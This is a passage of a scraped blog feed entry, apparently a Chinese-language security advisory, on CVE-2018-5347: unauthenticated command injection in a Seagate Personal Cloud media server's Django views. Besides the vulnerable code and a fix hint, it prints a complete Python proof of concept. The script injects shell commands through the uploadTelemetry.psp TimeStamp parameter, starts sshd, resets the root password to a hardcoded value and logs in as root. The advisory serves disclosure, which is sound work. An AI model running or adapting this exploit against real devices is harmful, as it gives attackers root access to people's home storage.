<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uID <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;status&#8221;:&#8221;In Progress&#8221;}}&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">elif<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;url&#8221;:&#8221;%s&#8221;, &#8220;fileSize&#8221;:&#8221;%d&#8221;}}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">quote<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;utf-8&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getsize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;853&#8243;,&#8221;message&#8221;:&#8221;Id not recognized.&#8221;}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">commands<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getstatusoutput<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd_base<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216; start &#8216;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">time_stamp<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;archiveID&#8221;:&#8221;%s&#8221;}}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a666371ac361662785131-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-22\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">except<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<p>\u8bf7\u6ce8\u610f\uff0c\u8fd9\u4e24\u4e2aviews\u90fd\u5305\u542bcsrf_exempt decorator\uff0c\u5b83\u4f1a\u7981\u7528Django\u7684\u9ed8\u8ba4\u5f00\u542f\u7684CSRF\u4fdd\u62a4\u3002 
\u56e0\u6b64\uff0c\u8fd9\u4e9b\u95ee\u9898\u53ef\u4ee5\u901a\u8fc7\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6765\u8fdb\u884c\u5229\u7528\u3002 \u4ee5\u4e0a\u4ee3\u7801\u4e2d\uff0c\u7528\u6237\u8f93\u5165\u7684time_stamp\u53c2\u6570\u672a\u7ecf\u9a8c\u8bc1\uff0c\u88ab\u4f20\u9012\u7ed9commands.getstatusoutput\u6267\u884c\u7684\u7cfb\u7edf\u547d\u4ee4\uff1b\u4fee\u590d\u65f6\u5e94\u9a8c\u8bc1\u8be5\u53c2\u6570\uff0c\u5e76\u4ee5\u53c2\u6570\u7684\u65b9\u5f0f\u4f20\u9012\uff0c\u4e0d\u901a\u8fc7shell\u6267\u884c\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><br \/> \u4e0b\u9762\u7684\u6f0f\u6d1e\u9a8c\u8bc1\u4ee3\u7801\u5c06\u5c1d\u8bd5\u542f\u7528SSH\u670d\u52a1\uff0c\u5e76\u66f4\u6539root\u5bc6\u7801\u3002 \u5982\u679c\u6210\u529f\uff0c\u5219\u53ef\u4ee5\u4f7f\u7528\u65b0\u5bc6\u7801\u901a\u8fc7SSH\u767b\u5f55\u8bbe\u5907\u3002<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a666371ac364825426699\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div 
class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python  import os  import urllib       scheme = &#8216;http&#8217;  host = &#8216;personalcloud.local&#8217;  port = &#8217;80&#8217;  path = &#8216;uploadTelemetry.psp&#8217;  querystr = &#8216;TimeStamp=%3b&#8217;  #path = &#8216;getLogs.psp&#8217;  #querystr = &#8216;time_stamp=%3b&#8217;  password = &#8216;Welcome01&#8217;       cmds = [&#8216;ngc &#8211;start sshd 2&gt;&amp;1&#8217;,        &#8216;echo -e &#8220;%(s)sn%(s)s&#8221;|passwd 2&gt;&amp;1&#8217; % {&#8216;s&#8217; : password}]       for cmd in cmds:     print &#8216;Running command&#8217;, repr(cmd)     cmd = urllib.quote_plus(cmd)     r = urllib.urlopen(&#8216;%s:\/\/%s:%s\/%s?%s%s&#8217; % (scheme, host, port, path, querystr, cmd))     print r.read()       print &#8216;Log in with&#8217;, password  os.system(&#8216;ssh -p 2222 root@%s&#8217; % host)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5a666371ac364825426699-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac364825426699-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac364825426699-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" 
id=\"crayon-5a666371ac364825426699-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urllib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-4\"><span class=\"crayon-e\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-5\"><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;http&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-6\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;personalcloud.local&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-7\"><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8217;80&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-8\"><span class=\"crayon-v\">path<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;uploadTelemetry.psp&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-9\"><span class=\"crayon-v\">querystr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TimeStamp=%3b&#8217;<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-10\"><span class=\"crayon-p\">#path = &#8216;getLogs.psp&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-11\"><span class=\"crayon-p\">#querystr = &#8216;time_stamp=%3b&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-12\"><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Welcome01&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-14\"><span class=\"crayon-v\">cmds<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;ngc &#8211;start sshd 2&gt;&amp;1&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;echo -e &#8220;%(s)sn%(s)s&#8221;|passwd 2&gt;&amp;1&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-17\"><span 
class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cmd <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmds<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Running command&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">repr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">quote_plus<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;%s:\/\/%s:%s\/%s?%s%s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">querystr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-21\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-22\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac364825426699-23\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Log in with&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">password<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac364825426699-24\"><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;ssh -p 2222 root@%s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0019 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" 
onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3648\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 12:07:17 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e24\u4e2a\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002 \u5e0c\u6377\u4e2a\u4eba\u4e91\u5bb6\u5ead\u5a92\u4f53\u5b58\u50a8\u8bbe\u5907\u662f\u201c\u5b58\u50a8\uff0c\u6574\u7406\uff0c\u6d41\u5f0f\u4f20\u8f93\uff0c\u5171\u4eab\u6240\u6709\u97f3\u4e50\uff0c\u7535\u5f71\uff0c\u7167\u7247\u548c\u91cd\u8981\u6587\u6863\u7684\u6700\u7b80\u5355\u7684\u65b9\u5f0f\u201d\u3002 \u6f0f\u6d1e\u63d0\u4ea4\u8005 \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458Yorick Koster\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002 \u5382\u5546\u54cd\u5e94 \u5e0c\u6377\u572810\u670816\u65e5\u88ab\u544a\u77e5\u8be5\u6f0f\u6d1e\uff0c\u867d\u7136\u5df2\u786e\u8ba4\u6536\u5230\u6f0f\u6d1e\u4fe1\u606f\uff0c\u4f46\u62d2\u7edd\u56de\u5e94\uff08\u6211\u4eec\u7ed9\u51fa\u7684\uff09\u6280\u672f\u7ec6\u8282\uff0c\u4e5f\u6ca1\u6709\u7ed9\u51fa\u786e\u5b9a\u7684\u4fee\u590d\u65f6\u95f4\u6216\u662f\u534f\u8c03\u62a5\u544a\u3002 CVE\uff1aCVE-2018-5347 \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f Seagate Media Server\u4f7f\u7528Django Web\u6846\u67b6\u5e76\u6620\u5c04\u5230.psp\u6269\u5c55\u540d\u3002 
\u4efb\u4f55\u4ee5.psp\u7ed3\u5c3e\u7684URL\u90fd\u4f1a\u4f7f\u7528FastCGI\u534f\u8bae\u81ea\u52a8\u53d1\u9001\u5230Seagate Media Server\u5e94\u7528\u7a0b\u5e8f\u3002 \/etc\/lighttpd\/conf.d\/django-host.conf: [crayon-5a666358f0897494367467\/] URL\u88ab\u6620\u5c04\u5230\u6587\u4ef6\/usr\/lib\/django_host\/seagate_media_server\/urls.py\u4e2d\u7279\u5b9a\u7684views\u3002 \u6709\u4e24\u4e2aviews\u53d7\u5230\u672a\u7ecf\u8ba4\u8bc1\u7684\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002 \u53d7\u5f71\u54cd\u7684views\u662f\uff1a uploadTelemetry getLogs \u8fd9\u4e9bviews\u4eceGET\u53c2\u6570\u83b7\u53d6\u7528\u6237\u8f93\u5165\uff0c\u5e76\u5c06\u8fd9\u4e9b\u672a\u7ecf\u9a8c\u8bc1\/\u89e3\u6790\u7684\u53c2\u6570\u4f20\u9012\u7ed9Python\u6a21\u5757\u76f8\u5e94\u7684\u51fd\u6570\u3002 \u8fd9\u5141\u8bb8\u653b\u51fb\u8005\u6ce8\u5165\u4efb\u610f\u7684\u7cfb\u7edf\u547d\u4ee4\uff0c\u8fd9\u4e9b\u547d\u4ee4\u5c06\u4ee5root\u6743\u9650\u6267\u884c\u3002 \/usr\/lib\/django_host\/seagate_media_server\/views.py\uff1a [crayon-5a666358f08a3012049689\/] \/usr\/lib\/django_host\/seagate_media_server\/views.py: [crayon-5a666358f08a8093835846\/] 